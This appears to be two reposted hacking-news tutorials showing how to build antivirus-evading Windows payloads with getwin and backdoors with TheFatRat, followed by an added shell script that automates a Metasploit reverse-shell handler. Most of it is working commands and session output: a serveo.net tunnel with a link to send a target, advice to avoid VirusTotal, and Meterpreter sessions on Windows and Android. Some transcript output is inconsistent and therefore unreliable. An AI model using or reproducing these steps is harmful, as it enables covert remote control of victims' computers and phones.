The post Create Windows 10 FUD (Fully Undetectable) payload appeared first on Information Security Newspaper | Hacking News.
The payload generated by this tool was not detected by Windows 10 Defender at the time of testing; that is all "FUD" (fully undetectable) means here, and detection can change with the next signature update. Do not upload the generated payload to virustotal.com: uploaded samples are shared with antivirus vendors, so the payload would be signatured quickly.
The tool needs no configuration: there is no port forwarding to set up and no other software to install, because the listener is exposed through a serveo.net tunnel (see the "Forwarding ... from serveo.net" lines in the transcript below). Note that this means the relay operator sits in the path of the reverse shell. The demonstration is shown in the video below.
root@kali:/home/iicybersecurity/Downloads# git clone https://github.com/thelinuxchoice/getwin.git
Cloning into 'getwin'…
remote: Enumerating objects: 46, done.
remote: Total 46 (delta 0), reused 0 (delta 0), pack-reused 46
Unpacking objects: 100% (46/46), done.
root@kali:/home/iicybersecurity/Downloads# cd getwin/
root@kali:/home/iicybersecurity/Downloads/getwin# chmod u+x getwin.sh
root@kali:/home/iicybersecurity/Downloads/getwin# ls
getwin.sh  icon  LICENSE  README.md
root@kali:/home/iicybersecurity/Downloads/getwin# ./getwin.sh
_______ _ _ _ _
(_______) _ (_)(_)(_)(_)
_ ___ _____ _| |_ _ _ _ _ ____
| | (_ || ___ |(_ _)| || || || || _ \
| |___) || ____| | |_ | || || || || | | |
\_____/ |_____) \__) \_____/ |_||_| |_|v1.2
.:.: FUD win32 payload generator and listener :.:.
.:.: Coded by:@linux_choice :.:.
:: Warning: Attacking targets without ::
:: prior mutual consent is illegal! ::
[*] Choose a Port (Default: 4098 ):
[*] Payload name (Default: payload ): test01
[*] Put ICON path (Default: icon/messenger.ico ):
[*] Compiling…
[*] Saved: test01.exe
[!] Please, don't upload to virustotal.com !
[*] Starting server…
[*] Send the first link above to target + /test01.exe:
Forwarding HTTP traffic from https://ludius.serveo.net
Forwarding TCP connections from serveo.net:2119
[*] Waiting connection…
listening on [any] 1547 …
[*] Waiting connection…
listening on [any] 4342 …
connect to [127.0.0.1] from localhost [127.0.0.1] 43878
TCP connection from 27.4.174.190 on port 3352
Microsoft Windows [Version 10.0.17758.1]
(c) 2018 Microsoft Corporation. All rights reserved.

E:\>C:
C:

C:\>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::c947:1c34:3f73:be30%13
   IPv4 Address. . . . . . . . . . . : 192.168.1.5
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::1%13
                                       192.168.1.1

C:\>getmac
getmac

Physical Address    Transport Name
=================== ==========================================================
##-##-##-E8-##-##   \Device\Tcpip_{F237F6ED-8EC9-42C1-93F8-E95EDB31D7FC}

(The MAC address has been masked by the author for security reasons.)
The post Hack Windows, Android, Mac using TheFatRat (Step by Step tutorial) appeared first on Information Security Newspaper | Hacking News.
An ethical hacking researcher at the International Institute of Cyber Security did a detailed analysis of how TheFatRat works, to look inside this pentesting tool.
TheFatRat is another Metasploit-style tool that makes generating backdoors easy. It compiles executables that embed popular Metasploit payloads, which can then be used against Windows, macOS and Linux targets. It offers options such as creating backdoors and infected DLLs.
The tool was tested on Parrot OS. The resulting backdoors were then run on Windows 10 (the author gives build 1607) and on Android.
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.1.12
LHOST => 192.168.1.12
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.1.12:4444
[*] Sending stage (179779 bytes) to 192.168.1.5
[*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.5:61050) at 2019-01-30 12:24:04 +0000
meterpreter > sysinfo
Computer : DESKTOP-2304ULE
OS : Windows 10 (Build 16299).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.1.12
LHOST => 192.168.1.12
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.1.12:4444
[*] Sending stage (179779 bytes) to 192.168.1.5
[*] Meterpreter session 2 opened (192.168.1.12:4444 -> 192.168.1.5:61331) at 2019-01-30 15:19:28 +0000
meterpreter >
[*] Sending stage (179779 bytes) to 192.168.1.5
[*] Meterpreter session 3 opened (192.168.1.12:4444 -> 192.168.1.5:61336) at 2019-01-30 15:20:01 +0000
meterpreter >
The three backdoors differ as follows. The first uses C# plus PowerShell, and you have to deliver the files to the target yourself. The second is built simply by choosing options in the menu, and the payload has to be set by hand. The third uses an Apache web server to host the backdoor. The third produced the most robust backdoor for an attacker: its session did not drop easily, whereas the sessions from the first two dropped suddenly during testing. Note that the session listing below reports a php/linux Meterpreter running as www-data under apache2, that is, a PHP payload executing on the web server itself, while the sysinfo output that follows it describes the Windows 10 desktop; those two captures cannot come from the same session.
[*] Meterpreter session 1 opened (192.168.1.12:80 -> 192.168.1.5:61331) at 2019-01-30 17:45:28 +0000
Id  Type                    Information              Connection
--  ----                    -----------              ----------
1   meterpreter php/linux   www-data (33) @ apache2  192.168.1.7:80 -> 192.178.1.5:61331
msf exploit(handler) > sessions -i 1
meterpreter > sysinfo
Computer : DESKTOP-2304ULE
OS : Windows 10 (Build 16299).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.1.7
LHOST => 192.168.1.7
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.1.7:4444
[*] Sending stage (70554 bytes) to 192.168.1.12
[*] Meterpreter session 1 opened (192.168.1.7:4444 -> 192.168.1.12:58445) at 2019-01-31 02:04:20 +0000
meterpreter > help
Core Commands
Command                   Description
-------                   -----------
?                         Help menu
background                Backgrounds the current session
bg                        Alias for background
bgkill                    Kills a background meterpreter script
bglist                    Lists running background scripts
bgrun                     Executes a meterpreter script as a background thread
channel                   Displays information or control active channels
close                     Closes a channel
disable_unicode_encoding  Disables encoding of unicode strings
enable_unicode_encoding   Enables encoding of unicode strings
exit                      Terminate the meterpreter session
get_timeouts              Get the current session timeout values
guid                      Get the session GUID
help                      Help menu
info                      Displays information about a Post module
irb                       Open an interactive Ruby shell on the current session
load                      Load one or more meterpreter extensions
machine_id                Get the MSF ID of the machine attached to the session
pry                       Open the Pry debugger on the current session
quit                      Terminate the meterpreter session
read                      Reads data from a channel
resource                  Run the commands stored in a file
run                       Executes a meterpreter script or Post module
sessions                  Quickly switch to another session
set_timeouts              Set the current session timeout values
sleep                     Force Meterpreter to go quiet, then re-establish session.
transport                 Change the current transport mechanism
use                       Deprecated alias for "load"
uuid                      Get the UUID for the current session
write                     Writes data to a channel
meterpreter > sysinfo
Computer : localhost
OS : Android 4.4.2 - Linux 3.10.52-android-x86+ (i686)
Meterpreter : dalvik/android
meterpreter >
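The same exploit/multi/handler setup is typed by hand three times in this article (twice for windows/meterpreter/reverse_tcp, once for android/meterpreter/reverse_tcp). As an added example, not part of TheFatRat or of the original article, the POSIX shell below writes that setup into a msfconsole resource script from the payload, LHOST and LPORT values used in the transcripts, and adds `set ExitOnSession false` with `exploit -j` so a single handler keeps accepting connections, which matters for the reconnecting sessions 2 and 3 shown above. The file name handler.rc, the RUN_HANDLER variable and the two helper function names are this example's own assumptions.

```shell
#!/bin/sh
# Added example: build a msfconsole resource script for the
# exploit/multi/handler listener used throughout this article.
# Payload/LHOST/LPORT values come from the transcripts above; the
# file name handler.rc and the RUN_HANDLER variable are assumptions
# of this example, not part of TheFatRat.

# Usage: write_handler_rc <payload> <lhost> <lport> <outfile>
write_handler_rc() {
    payload=$1; lhost=$2; lport=$3; out=$4

    # Reject a non-numeric or out-of-range LPORT before msfconsole sees it.
    case "$lport" in
        ''|*[!0-9]*) echo "LPORT must be numeric: $lport" >&2; return 1 ;;
    esac
    if [ "$lport" -lt 1 ] || [ "$lport" -gt 65535 ]; then
        echo "LPORT out of range: $lport" >&2; return 1
    fi

    # ExitOnSession false plus exploit -j keeps the handler listening as a
    # background job after the first session arrives, so a dropped and
    # re-launched payload (sessions 2 and 3 above) lands on the same handler.
    cat > "$out" <<EOF
use exploit/multi/handler
set PAYLOAD $payload
set LHOST $lhost
set LPORT $lport
set ExitOnSession false
exploit -j
EOF
}

# Usage: check_handler_rc <file>; returns 0 when every required line is present.
check_handler_rc() {
    f=$1
    for key in "use exploit/multi/handler" "set PAYLOAD " "set LHOST " "set LPORT " "exploit -j"; do
        grep -q "^$key" "$f" || return 1
    done
    return 0
}

# Optional launch, only when RUN_HANDLER is set and msfconsole is installed:
#   RUN_HANDLER=1 sh handler.sh
if [ -n "${RUN_HANDLER:-}" ] && command -v msfconsole >/dev/null 2>&1; then
    write_handler_rc windows/meterpreter/reverse_tcp 192.168.1.12 4444 handler.rc
    msfconsole -q -r handler.rc
fi
```

Swap the first argument for android/meterpreter/reverse_tcp and the LHOST for 192.168.1.7 to reproduce the Android handler from the last transcript; the resource file is plain msfconsole input, so it can also be pasted into an existing console.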